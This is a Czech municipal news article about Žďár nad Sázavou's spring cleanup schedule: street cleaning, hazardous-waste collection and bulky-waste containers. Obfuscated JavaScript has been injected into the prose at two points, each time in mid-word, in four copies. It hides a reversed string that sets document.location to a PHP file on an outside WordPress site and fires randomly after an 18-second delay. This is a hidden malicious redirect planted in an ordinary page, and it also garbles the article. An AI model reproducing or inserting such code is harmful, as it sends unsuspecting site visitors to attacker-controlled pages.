Rainbow page separator

Se začátkem dubna ve Žďáře začne pravidelný jarní úklid

Pondělí, 1. dubna 2019

Žďár nad Sázavou / Prvním dubnovým dnem začne le["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tošní jarní úklid města. Od začátku měsíce bude podle harmonogramu dostupného na webu Žďáru probíhat blokové čistění ulic, přičemž stanovené termíny mohou být v případě nepříznivého počasí posunuty, tudíž je třeba se řídit především přechodným dopravním značením. Ve dnech 8. až 10. dubna bude ze žďárských ulic svezen nebezpečný odpad, přičemž je možné odložit odpady s nebezpečnými vlastnostmi, jako jsou například rádia, televizory, ledničky, plechovky, nádoby od barev, laků, ředidel, zářivky, monočlánky, akumulá["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tory a jiné obaly znečištěné škodlivinami. Elektrospotřebiče, které dosloužily, ale jsou stále kompletní, jsou pak odevzdány zdarma ve zpětném odběru k dalšímu využití. Nekompletní spotřebiče musí být zlikvidovány jako odpad na skládce nebezpečného odpadu. Po ukončení mobilního svozu je možné uložit nebezpečné i všechny další odpady ve sběrném dvoře v Jihlavské ulici. V době od 11. do 24. dubna budou v rámci jarního úklidu na obvyklých stanovištích rozmístěny velkoobjemové kontejnery na objemný odpad a odpad ze zeleně. Objemný odpad bude odvezen na skládku do Ronova nad Sázavou a odpad ze zeleně skončí ve žďárské bioplynové stanici.